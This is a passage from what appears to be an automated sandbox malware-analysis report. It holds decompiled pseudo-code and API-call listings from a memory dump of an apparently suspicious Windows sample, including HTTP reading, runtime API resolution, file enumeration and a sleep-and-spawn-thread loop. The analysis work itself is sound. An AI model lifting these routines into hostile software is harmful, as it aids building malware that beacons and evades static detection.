					_v12 = _t52;
					if(_t24 > 0) {
						do {
							_push(0xa8);
							L0039A47E();
							_t55 = _t55 + 4;
							if(_t24 == 0) {
								_t53 = 0;
								__eflags = 0;
							} else {
								_t53 = E0039B110(_t24);
							}
							 *((intOrPtr*)(_t53 + 0x44)) = _t51;
							if(E00393630(_t53,  *((intOrPtr*)( *((intOrPtr*)(_t51 + 8)))),  *((intOrPtr*)(_t37 + _v12 * 4))) == 0 ||  *((intOrPtr*)(_t53 + 0x14)) == 0 || E0039C960(_t51, _t53) == 0 || E0039D6E0(_t51, _t53) == 0) {
								E00397A20(_t37, _t53, _t51);
								_push(_t53);
								L00391CB0();
								_t55 = _t55 + 4;
							}
							_t24 = _v8;
							_t45 = _v12 + 1;
							_v12 = _t45;
						} while (_t45 < _t24);
					}
					_t52 = 1;
					if(_t37 != 0) {
						while(_t24 != 0) {
							_v8 = _t24 - 1;
							E0039BB40( *((intOrPtr*)(_t37 + (_t24 - 1) * 4)));
							_t24 = _v8;
							_t55 = _t55 + 4;
						}
						_v8 = _t24 - 1;
						E0039BB40(_t37);
					}
				}
				return _t52;
			}

















    0x00395714
    0x00395717
    0x00395719
    0x0039571c
    0x0039572c
    0x00395731
    0x00395733
    0x00395736
    0x0039573b
    0x00395745
    0x0039574a
    0x00395750
    0x00395750
    0x00395755
    0x0039575a
    0x0039575f
    0x0039576c
    0x0039576c
    0x00395761
    0x00395768
    0x00395768
    0x00395771
    0x00395787
    0x003957a9
    0x003957ae
    0x003957af
    0x003957b4
    0x003957b4
    0x003957ba
    0x003957bd
    0x003957be
    0x003957c1
    0x00395750
    0x003957c5
    0x003957cc
    0x003957d0
    0x003957d3
    0x003957da
    0x003957df
    0x003957e2
    0x003957e5
    0x003957eb
    0x003957ee
    0x003957f3
    0x003957cc
    0x003957fe

    APIs
      • Part of subcall function 00392450: FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 003924FB
      • Part of subcall function 00392450: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003925D3
      • Part of subcall function 00392450: GetLastError.KERNEL32 ref: 003925DD
    • ??2@YAPAXI@Z.MSVCRT ref: 00395755
      • Part of subcall function 00393630: SysFreeString.OLEAUT32(?), ref: 00393668
      • Part of subcall function 00393630: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00393693
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003957AF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1660, Relevance: 3.1, APIs: 2, Instructions: 67
    C-Code - Quality: 37%
    			E003B1660(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t17;
				char* _t20;
				intOrPtr _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t25;
				long _t32;
				void* _t33;
				void* _t34;

				_t17 = 0;
				_t25 = __ecx;
				_t32 = 0;
				_t33 = 0;
				_v16 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
					while(1) {
						_v8 = _t17;
						_t20 =  &_v8;
						__imp__WinHttpQueryDataAvailable( *((intOrPtr*)(_t25 + 0xc)), _t20); // executed
						if(_t20 == 0) {
							goto L11;
						}
						_t21 = _v8;
						if(_t21 == 0) {
							L10:
							_v12 = 1;
						} else {
							_t32 = _t32 + _t21;
							if(_t33 == 0) {
								_t22 = E003A1D90(_t32, 0);
								_t34 = _t34 + 8;
								_t33 = _t22;
							} else {
								_t23 = E003A1D90(_t32, _t33); // executed
								_t33 = _t23;
								_t34 = _t34 + 8;
								_t22 = _t23 - _v8 + _t32;
							}
							__imp__WinHttpReadData( *((intOrPtr*)(_t25 + 0xc)), _t22, _v8,  &_v16);
							if(_t22 != 0) {
								if(_v8 > 0) {
									_t17 = 0;
									continue;
								} else {
									goto L10;
								}
							}
						}
						goto L11;
					}
				}
				L11:
				 *_a4 = _t33;
				 *_a8 = _t32;
				return _v12;
			}















    0x003b1668
    0x003b166b
    0x003b166d
    0x003b166f
    0x003b1671
    0x003b1674
    0x003b167a
    0x003b1682
    0x003b1685
    0x003b1688
    0x003b168d
    0x003b1695
    0x00000000
    0x00000000
    0x003b1697
    0x003b169c
    0x003b16e1
    0x003b16e1
    0x003b169e
    0x003b169e
    0x003b16a2
    0x003b16ba
    0x003b16bf
    0x003b16c2
    0x003b16a4
    0x003b16a6
    0x003b16ab
    0x003b16b0
    0x003b16b3
    0x003b16b3
    0x003b16d1
    0x003b16d9
    0x003b16df
    0x003b1680
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003b16df
    0x003b16d9
    0x00000000
    0x003b169c
    0x003b1682
    0x003b16e8
    0x003b16ee
    0x003b16f3
    0x003b16fb

    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 003B168D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 003B16D1
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039D750, Relevance: 3.1, APIs: 2, Instructions: 61
    C-Code - Quality: 37%
    			E0039D750(intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				intOrPtr _t18;
				intOrPtr* _t19;
				void* _t21;
				char _t24;
				intOrPtr _t33;
				intOrPtr* _t35;

				_t24 = 0;
				_t35 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					if(E00391170(_a4, 0xfde9,  &_v8, _a8) != 0) {
						_t18 = _v8;
						__imp__#2(_t18, __edi);
						_t33 = _t18;
						if(_t33 != 0) {
							_t19 =  *((intOrPtr*)(_t35 + 4));
							_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t19 + 0x104))))(_t19, _t33,  &_v12); // executed
							if(_t21 >= 0 && _v12 != 0) {
								_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t35))))();
							}
							__imp__#6(_t33);
						}
					}
					_t16 = _v8;
					if(_v8 != 0) {
						E0039BB40(_t16);
					}
				}
				return _t24;
			}











    0x0039d757
    0x0039d75a
    0x0039d75c
    0x0039d75f
    0x0039d765
    0x0039d782
    0x0039d784
    0x0039d789
    0x0039d78f
    0x0039d793
    0x0039d795
    0x0039d7a6
    0x0039d7aa
    0x0039d7ba
    0x0039d7ba
    0x0039d7bd
    0x0039d7bd
    0x0039d7c3
    0x0039d7c4
    0x0039d7c9
    0x0039d7cc
    0x0039d7d1
    0x0039d7c9
    0x0039d7db

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 0039D789
    • SysFreeString.OLEAUT32(00000000), ref: 0039D7BD
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039CE00, Relevance: 3.1, APIs: 2, Instructions: 59
    C-Code - Quality: 46%
    			E0039CE00(void* __ecx, char __edx) {
				char _v8;
				void* _t10;
				void* _t11;
				void* _t13;
				intOrPtr _t17;
				char _t21;
				intOrPtr* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t30;

				_t21 = __edx;
				_t23 = __imp___time64;
				_t24 = __ecx;
				_t10 =  *_t23(0);
				_t26 = _t25 + 4;
				_t11 = _t10 -  *0x3b85b0;
				_t30 = _t11;
				asm("sbb edx, [0x3b85b4]");
				_v8 = __edx;
				if(_t30 < 0) {
					L10:
					return _t11;
				} else {
					if(_t30 > 0) {
						L3:
						_t13 = E003B1E30(_t31,  &_v8); // executed
						_t27 = _t26 + 4;
						if(_t13 == 0) {
							__eflags =  *((intOrPtr*)(_t24 + 0x2c));
							if( *((intOrPtr*)(_t24 + 0x2c)) != 0) {
								return E0039BB40(_v8);
							}
							 *((intOrPtr*)(_t24 + 0x2c)) = _v8;
							return _t13;
						} else {
							_t16 =  *((intOrPtr*)(_t24 + 0x2c));
							if( *((intOrPtr*)(_t24 + 0x2c)) != 0) {
								E0039BB40(_t16);
								_t27 = _t27 + 4;
							}
							 *((intOrPtr*)(_t24 + 0x2c)) = _v8;
							_t17 =  *_t23(0);
							 *0x3b85b0 = _t17;
							 *0x3b85b4 = _t21;
							return _t17;
						}
					} else {
						_t31 = _t11 - 0x7080;
						if(_t11 <= 0x7080) {
							goto L10;
						} else {
							goto L3;
						}
					}
				}
			}















    0x0039ce00
    0x0039ce08
    0x0039ce10
    0x0039ce12
    0x0039ce14
    0x0039ce17
    0x0039ce17
    0x0039ce1d
    0x0039ce23
    0x0039ce26
    0x0039ce92
    0x0039ce92
    0x0039ce28
    0x0039ce28
    0x0039ce31
    0x0039ce35
    0x0039ce3a
    0x0039ce3f
    0x0039ce6f
    0x0039ce73
    0x00000000
    0x0039ce8a
    0x0039ce79
    0x0039ce80
    0x0039ce41
    0x0039ce41
    0x0039ce46
    0x0039ce49
    0x0039ce4e
    0x0039ce4e
    0x0039ce56
    0x0039ce59
    0x0039ce5f
    0x0039ce64
    0x0039ce6e
    0x0039ce6e
    0x0039ce2a
    0x0039ce2a
    0x0039ce2f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039ce2f
    0x0039ce28

    APIs
    • _time64.MSVCRT ref: 0039CE12
    • _time64.MSVCRT ref: 0039CE59
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B1320, Relevance: 3.0, APIs: 2, Instructions: 49
    APIs
    • WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,003B1EB0,?,00000000), ref: 003B1330
    • WinHttpConnect.WINHTTP(?,?,003B1EB0,00000000,?,003B1EB0,?,00000000), ref: 003B135F
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B167E, Relevance: 3.0, APIs: 2, Instructions: 48
    C-Code - Quality: 37%
    			E003B167E(void* __ebx, long __edi, void* __esi) {
				void* _t15;
				intOrPtr _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				long _t29;
				void* _t31;
				void* _t33;
				void* _t35;

				_t31 = __esi;
				_t29 = __edi;
				_t22 = __ebx;
				while(1) {
					 *((intOrPtr*)(_t33 - 4)) = 0;
					_t15 = _t33 - 4;
					__imp__WinHttpQueryDataAvailable( *((intOrPtr*)(_t22 + 0xc)), _t15); // executed
					if(_t15 == 0) {
						break;
					}
					_t18 =  *((intOrPtr*)(_t33 - 4));
					if(_t18 == 0) {
						L9:
						 *((intOrPtr*)(_t33 - 8)) = 1;
					} else {
						_t29 = _t29 + _t18;
						if(_t31 == 0) {
							_t19 = E003A1D90(_t29, 0);
							_t35 = _t35 + 8;
							_t31 = _t19;
						} else {
							_t20 = E003A1D90(_t29, _t31); // executed
							_t31 = _t20;
							_t35 = _t35 + 8;
							_t19 = _t20 -  *((intOrPtr*)(_t33 - 4)) + _t29;
						}
						__imp__WinHttpReadData( *((intOrPtr*)(_t22 + 0xc)), _t19,  *((intOrPtr*)(_t33 - 4)), _t33 - 0xc);
						if(_t19 != 0) {
							if( *((intOrPtr*)(_t33 - 4)) > 0) {
								continue;
							} else {
								goto L9;
							}
						}
					}
					break;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)))) = _t31;
				 *((intOrPtr*)( *((intOrPtr*)(_t33 + 0xc)))) = _t29;
				return  *((intOrPtr*)(_t33 - 8));
			}












    0x003b167e
    0x003b167e
    0x003b167e
    0x003b1680
    0x003b1685
    0x003b1688
    0x003b168d
    0x003b1695
    0x00000000
    0x00000000
    0x003b1697
    0x003b169c
    0x003b16e1
    0x003b16e1
    0x003b169e
    0x003b169e
    0x003b16a2
    0x003b16ba
    0x003b16bf
    0x003b16c2
    0x003b16a4
    0x003b16a6
    0x003b16ab
    0x003b16b0
    0x003b16b3
    0x003b16b3
    0x003b16d1
    0x003b16d9
    0x003b16df
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003b16df
    0x003b16d9
    0x00000000
    0x003b169c
    0x003b16ee
    0x003b16f3
    0x003b16fb

    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 003B168D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 003B16D1
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00397FC0, Relevance: 3.0, APIs: 2, Instructions: 44
    C-Code - Quality: 37%
    			E00397FC0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t15;
				void* _t25;

				_t25 = __ecx;
				_t2 = _t25 + 0x78; // 0x78
				_t4 = _t25 + 0x74; // 0x74
				_t12 = E003968A0(__ecx, 0, _a4, _a8, _a12, _t4, _t2); // executed
				if(_t12 == 0 || E003A1870(__ecx) == 0) {
					return 0;
				} else {
					_t15 =  *((intOrPtr*)(__ecx + 0x10));
					if(_t15 != 0) {
						__imp__#6(_t15);
					}
					__imp__#2(_a16);
					 *((intOrPtr*)(_t25 + 0x10)) = _t15;
					 *((intOrPtr*)(_t25 + 0x64)) = 1;
					return 1;
				}
			}







    0x00397fc8
    0x00397fca
    0x00397fd1
    0x00397fdf
    0x00397fe6
    0x00398021
    0x00397ff3
    0x00397ff3
    0x00397ff8
    0x00397ffb
    0x00397ffb
    0x00398005
    0x0039800b
    0x00398014
    0x00398019
    0x00398019

    APIs
      • Part of subcall function 003968A0: memcpy.MSVCRT ref: 00396998
    • SysFreeString.OLEAUT32(?), ref: 00397FFB
    • SysAllocString.OLEAUT32(0039EF86), ref: 00398005
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F250, Relevance: 3.0, APIs: 2, Instructions: 43library
    C-Code - Quality: 100%
    			E0039F250(void* __eflags, struct HINSTANCE__* _a4) {
				short _v204;
				char _v464;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t17;
				_Unknown_base(*)()** _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t17 = _a4;
				E00399090(__eflags,  &_v204,  *_t17);
				_t26 = _t25 + 8;
				_t14 = LoadLibraryW( &_v204);
				_t4 = _t17 + 0xc; // 0xcccccccc
				_t5 = _t17 + 4; // 0x754f10c6
				_t24 =  *_t5;
				_t23 =  *_t4 +  *0x3b8628;
				_a4 = _t14;
				_t7 = _t17 + 8; // 0xc35e5ff1
				if(_t24 <=  *_t7) {
					do {
						E00396CB0( &_v464, _t24);
						_t26 = _t26 + 8;
						_t14 = GetProcAddress(_a4,  &_v464);
						 *_t23 = _t14;
						_t24 = _t24 + 1;
						_t23 = _t23 + 4;
						_t11 = _t17 + 8; // 0xc35e5ff1
					} while (_t24 <=  *_t11);
				}
				return _t14;
			}











    0x0039f25a
    0x0039f269
    0x0039f26e
    0x0039f278
    0x0039f27e
    0x0039f281
    0x0039f281
    0x0039f284
    0x0039f28a
    0x0039f28d
    0x0039f290
    0x0039f292
    0x0039f29a
    0x0039f2a2
    0x0039f2ad
    0x0039f2b3
    0x0039f2b5
    0x0039f2b6
    0x0039f2b9
    0x0039f2b9
    0x0039f292
    0x0039f2c4

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 0039F278
    • GetProcAddress.KERNEL32(00393E17,?), ref: 0039F2AD
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B08A0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 23sleep
    C-Code - Quality: 100%
    			E003B08A0(intOrPtr _a4) {
				intOrPtr _t6;
				intOrPtr _t14;
				intOrPtr _t16;

				_t16 = _a4;
				L1:
				_t6 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t6 + 0xac))))(0x3b8594);
				_t12 =  *((intOrPtr*)(_t16 + 4));
				if( *( *((intOrPtr*)(_t16 + 4))) > 0) {
					E0039A590(_t12, _t16);
				}
				_t14 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t14 + 0xc4))))(0x3b8594);
				Sleep(0x3e8); // executed
				goto L1;
			}






    0x003b08a4
    0x003b08b0
    0x003b08b0
    0x003b08c0
    0x003b08c2
    0x003b08c8
    0x003b08cb
    0x003b08cb
    0x003b08d0
    0x003b08e1
    0x003b08f4
    0x00000000

    APIs
    • Sleep.KERNELBASE(000003E8), ref: 003B08F4
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A85C
      • Part of subcall function 0039A590: CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039BAF0, Relevance: 3.0, APIs: 2, Instructions: 22
    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 0039BAF4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0039BB13
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B08A9, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19sleep
    C-Code - Quality: 100%
    			E003B08A9() {
				intOrPtr _t5;
				intOrPtr _t13;
				intOrPtr _t15;

				L1:
				_t5 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t5 + 0xac))))(0x3b8594);
				_t11 =  *((intOrPtr*)(_t15 + 4));
				if( *( *((intOrPtr*)(_t15 + 4))) > 0) {
					E0039A590(_t11, _t15);
				}
				_t13 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc4))))(0x3b8594);
				Sleep(0x3e8); // executed
				goto L1;
			}






    0x003b08b0
    0x003b08b0
    0x003b08c0
    0x003b08c2
    0x003b08c8
    0x003b08cb
    0x003b08cb
    0x003b08d0
    0x003b08e1
    0x003b08f4
    0x00000000

    APIs
    • Sleep.KERNELBASE(000003E8), ref: 003B08F4
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A85C
      • Part of subcall function 0039A590: CreateThread.KERNEL32(00000000,00000000,Function_000044B0,00000000,00000000,?), ref: 0039A8CA
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A8EE
      • Part of subcall function 0039A590: _time64.MSVCRT ref: 0039A9CE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00398F40, Relevance: 1.6, APIs: 1, Instructions: 93
    C-Code - Quality: 95%
    			E00398F40(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* _t11;
				intOrPtr _t13;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t48;
				void* _t51;

				_t39 = __edx;
				_push(__ecx);
				_t25 = _a4;
				_t41 = __ecx;
				_v8 = 0;
				if(E0039CA00(__ecx, __eflags, _a4) != 0) {
					L13:
					return 0;
				} else {
					_t11 = E0039D7E0(_t25);
					_t27 = _t11;
					if(_t11 == 0) {
						goto L13;
					} else {
						_t57 = _a8;
						if(_a8 == 0) {
							L5:
							_t13 = E0039EE40(_t41, _t39, _t59, _t27, _a12); // executed
							_t48 = _t13;
							if(_t48 != 0) {
								goto L9;
							} else {
								_t61 = _a8 - _t13;
								if(_a8 != _t13) {
									goto L12;
								} else {
									_t20 = E0039F5D0(_t61, _t27);
									_t62 = _t20;
									if(_t20 == 0) {
										goto L12;
									} else {
										_t48 = E00391BE0(_t41, _t62, _t27);
										if(_t48 == 0) {
											goto L12;
										} else {
											goto L9;
										}
									}
								}
							}
						} else {
							_t22 = E0039F5D0(_t57, _t27); // executed
							_t58 = _t22;
							if(_t22 == 0) {
								goto L5;
							} else {
								_t48 = E00391BE0(_t41, _t58, _t27);
								_t59 = _t48;
								if(_t48 != 0) {
									L9:
									 *((intOrPtr*)(_t48 + 0x44)) = _t41;
									if(E0039D6E0(_t41, _t48) == 0) {
										E00397A20(_t27, _t48, _t41);
										_push(_t48);
										L00391CB0();
										_t51 = _t51 + 4;
										L12:
										E0039BB40(_t27);
										return _v8;
									} else {
										_v8 = _t48;
										E0039BB40(_t27);
										return _t48;
									}
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}














    0x00398f40
    0x00398f43
    0x00398f45
    0x00398f4d
    0x00398f4f
    0x00398f59
    0x0039900c
    0x00399014
    0x00398f5f
    0x00398f62
    0x00398f67
    0x00398f6b
    0x00000000
    0x00398f71
    0x00398f71
    0x00398f74
    0x00398f90
    0x00398f97
    0x00398f9c
    0x00398fa0
    0x00000000
    0x00398fa2
    0x00398fa2
    0x00398fa5
    0x00000000
    0x00398fa7
    0x00398faa
    0x00398faf
    0x00398fb1
    0x00000000
    0x00398fb3
    0x00398fbb
    0x00398fbf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00398fbf
    0x00398fb1
    0x00398fa5
    0x00398f76
    0x00398f79
    0x00398f7e
    0x00398f80
    0x00000000
    0x00398f82
    0x00398f8a
    0x00398f8c
    0x00398f8e
    0x00398fc1
    0x00398fc4
    0x00398fce
    0x00398fe9
    0x00398fee
    0x00398fef
    0x00398ff4
    0x00398ff7
    0x00398ff8
    0x00399009
    0x00398fd0
    0x00398fd1
    0x00398fd4
    0x00398fe4
    0x00398fe4
    0x00000000
    0x00000000
    0x00000000
    0x00398f8e
    0x00398f80
    0x00398f74
    0x00398f6b

    APIs
      • Part of subcall function 0039EE40: ??2@YAPAXI@Z.MSVCRT ref: 0039EF57
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039EF96
      • Part of subcall function 0039EE40: ??3@YAXPAX@Z.MSVCRT ref: 0039F02B
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 00398FEF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039F5D0: GetFileAttributesW.KERNELBASE(00000000,00000000,00000001,00000000,?,00398FAF,00000000,00000000,00398A9D,00000000,00000000,00000000,00000000,?,00000001), ref: 0039F5F3
      • Part of subcall function 00391BE0: ??2@YAPAXI@Z.MSVCRT ref: 00391C02
      • Part of subcall function 00391BE0: ??3@YAXPAX@Z.MSVCRT ref: 00391C4A
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00396E80, Relevance: 1.6, APIs: 1, Instructions: 79
    C-Code - Quality: 64%
    			E00396E80(intOrPtr __ecx) {
				char _v8;
				char _v208;
				intOrPtr _t21;
				void* _t28;
				void* _t41;
